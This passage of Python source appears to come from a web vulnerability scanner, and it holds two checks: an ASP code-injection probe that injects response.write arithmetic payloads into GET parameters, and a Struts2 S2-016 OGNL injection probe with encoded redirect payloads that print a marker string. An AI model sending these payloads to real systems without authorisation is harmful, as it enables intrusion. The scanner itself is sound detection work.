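        if self.response.language and self.response.language != "ASP":
            return
        if self.requests.command != 'GET':
            return
        parsed = self.requests.urlparse
        if parsed.query == '':
            return
        if os.path.splitext(parsed.path)[1] not in acceptedExt:
            return

        headers = self.requests.get_headers()
        url = self.build_url()
        params = self.requests.params
        netloc = self.requests.netloc

        a = random.randint(10000, 90000)
        b = random.randint(10000, 90000)
        product = str(a * b)

        bare = 'response.write({}*{})'.format(a, b)
        payloads = [
            bare,
            "'+response.write({}*{})+'".format(a, b),
            '"response.write({}*{})+"'.format(a, b),
        ]

        for key, value in params.items():
            if key.lower() in ignoreParams:
                continue
            data = copy.deepcopy(params)
            for payload in payloads:
                # bare call replaces the value; string-breaking variants append
                data[key] = payload if payload is bare else value + payload
                probe_url = prepare_url(netloc, params=data)
                r = requests.get(probe_url, headers=headers)
                if product in r.text:
                    out.success(url, self.name, payload="{}:{}".format(key, data[key]), raw=r.raw)
                    break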
    def audit(self):
        """Struts2 ``redirect:${...}`` OGNL probe (S2-016 style) for GET requests.

        Runs only when the response language is unknown or JAVA and the request
        path's extension is in ``acceptedExt``. Each payload is first POSTed as
        a form-encoded body to the request URL, then, if that produced nothing,
        sent as the query string of ``netloc``. The first response containing
        ``<Struts2-vuln-Check>`` is reported via ``out.success`` and the method
        returns. Neither payload executes a command: payload 1 prints
        ``getRealPath("<Struts2-vuln-")`` + ``Check>``, payload 2 prints the
        marker in two halves. Returns None.

        NOTE(review): the ``Content-Type`` assignment writes into the dict
        returned by ``get_headers()``; confirm that is a copy and not the live
        request headers. ``playload`` (sic) is the keyword the other Struts
        checks here use; confirm ``out.success`` accepts it.
        """
        if self.response.language and self.response.language != "JAVA":
            return
        if self.requests.command != 'GET':
            return
        parsed = self.requests.urlparse
        if os.path.splitext(parsed.path)[1] not in acceptedExt:
            return

        headers = self.requests.get_headers()
        url = self.build_url()
        netloc = self.requests.netloc

        marker = '<Struts2-vuln-Check>'
        probes = [
            r"redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22<Struts2-vuln-%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().print(%23b),%23matt.getWriter().print('Check>'),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D",
            r"redirect%3a%24%7b%23resp%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2c%23resp.getWriter%28%29.print%28%27<Struts2-vuln%27%2b%27-Check>%27%29%2c%23resp.getWriter%28%29.flush%28%29%2c%23resp.getWriter%28%29.close%28%29%7d",
        ]

        def report(verb, resp, probe):
            out.success(url,
                        self.name,
                        playload=probe,
                        method=verb,
                        check=marker,
                        raw=resp.raw)

        headers['Content-Type'] = 'application/x-www-form-urlencoded'
        for probe in probes:
            # body first, then the same payload as a raw query string
            posted = requests.post(url, headers=headers, data=probe)
            if marker in posted.text:
                report("POST", posted, probe)
                return
            fetched = requests.get(netloc + '?' + probe, headers=headers)
            if marker in fetched.text:
                report("GET", fetched, probe)
                return